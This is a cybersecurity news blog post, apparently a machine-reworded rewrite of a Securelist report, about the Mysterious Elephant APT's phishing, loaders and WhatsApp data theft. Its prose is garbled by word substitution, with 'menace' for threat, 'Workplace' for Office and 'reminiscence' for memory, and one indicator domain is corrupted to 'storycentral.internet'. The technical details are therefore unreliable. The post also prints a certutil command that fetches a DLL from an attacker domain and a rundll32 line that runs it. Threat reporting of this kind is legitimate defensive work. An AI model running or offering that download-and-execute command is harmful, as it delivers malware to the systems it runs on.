Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Mysterious Elephant APT Hackers Infiltrate Organization to Steal Sensitive Information

Posted on October 16, 2025October 16, 2025 By CWS

In current months, a brand new superior persistent menace (APT) group referred to as Mysterious Elephant has emerged as a formidable adversary concentrating on authorities and diplomatic establishments throughout the Asia-Pacific area.

First recognized by Kaspersky’s International Analysis and Evaluation Crew (GReAT) in 2023, the group has continued to refine its toolkit, using each custom-built malware and modified open-source utilities to evade detection and preserve long-term entry.

Early indicators pointed to easy phishing lures delivering weaponized paperwork, however the newest marketing campaign displays a major evolution in each supply mechanisms and post-exploitation tooling.

Preliminary incursions leveraged spear-phishing emails embedding malicious Workplace paperwork exploiting CVE-2017-11882.

Upon person interplay, these paperwork drop a light-weight PowerShell loader that retrieves extra complicated payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the muse of the menace actor’s modular framework.

Because the marketing campaign progressed into 2025, Mysterious Elephant built-in a second-stage loader, MemLoader HidenDesk, to inject distant entry trojans immediately into reminiscence, lowering forensic artifacts on disk.

Securelist analysts famous that subsequent phases of the operation give attention to exfiltrating delicate WhatsApp information, together with paperwork, photographs, and archives, utilizing {custom} exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.

Mysterious Elephant spear phishing electronic mail (Supply – Securelist)

These parts encode stolen information with XOR-based obfuscation earlier than transmitting it by way of HTTP to wildcard DNS domains reminiscent of storycentral.internet and monsoonconference.com.

By leveraging official domains and HTTPS, the group blends malicious visitors with regular company internet use, complicating network-based detection.

# Obtain and execute BabShell payload
certutil -urlcache -f “hxxp://storycentral.internet/BabShell.dll” BabShell.dll
rundll32.exe BabShell.dll,EntryPoint

An infection Mechanism

The an infection chain begins with a spear-phishing electronic mail containing a seemingly benign assembly invitation in an RTF doc.

When opened, the doc triggers a reminiscence corruption vulnerability within the Workplace Equation Editor (CVE-2017-11882), silently spawning a PowerShell course of.

This PowerShell occasion operates in hidden mode (-nop -w hidden) and makes use of .NET’s WebClient class to fetch the BabShell DLL loader.

As soon as loaded, BabShell decrypts its embedded configuration, which incorporates C2 URLs and module names, earlier than invoking its EntryPoint export to ascertain a heartbeat channel.

After preliminary beaconing, BabShell fetches the MemLoader HidenDesk module, injecting it right into a system service course of.

This in-memory loader parses a {custom} packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.

By avoiding disk writes, MemLoader HidenDesk considerably diminishes kinetic proof, permitting Mysterious Elephant to navigate laterally and harvest goal information undetected.

The group’s use of open-source codebases, mixed with proprietary modifications, underscores each resourcefulness and technical sophistication.

Via these multi-stage an infection ways, Mysterious Elephant continues to refine its method, demanding equally adaptive protection methods from safety groups tasked with safeguarding delicate data.

Observe us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:APT, Elephant, Hackers, Infiltrate, Information, Mysterious, Organization, Sensitive, Steal

Post navigation

Previous Post: Senate Investigates Cisco Over Zero-Day Firewall Vulnerabilities
Next Post: Qilin Ransomware Using Ghost Bulletproof Hosting to Attack Organizations Worldwide

Related Posts

Blockchain Security – Protecting Decentralized Systems Cyber Security News
CNCERT Accuses of US Intelligence Agencies Attacking Chinese Military-Industrial Units Cyber Security News
New Spear-Phishing Attack Delivers DarkCloud Malware to Steal Keystrokes, FTP Credentials and Others Cyber Security News
SquareX Reveals That Employees Are No Longer The Weakest Link, Browser AI Agents Are Cyber Security News
Incident Response Planning – Preparing for Data Breaches Cyber Security News
New Clickfix Attack Promises “Free WiFi” But Delivers Powershell Based Malware Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US
  • Microsoft Windows 11 October Update Breaks Localhost (127.0.0.1) Connections
  • Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution
  • Threat Actors Leveraging ClickFake Interview Attack to Deploy OtterCandy Malware
  • Hackers Using AI to Automate Vulnerability Discovery and Malware Generation

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US
  • Microsoft Windows 11 October Update Breaks Localhost (127.0.0.1) Connections
  • Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution
  • Threat Actors Leveraging ClickFake Interview Attack to Deploy OtterCandy Malware
  • Hackers Using AI to Automate Vulnerability Discovery and Malware Generation

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News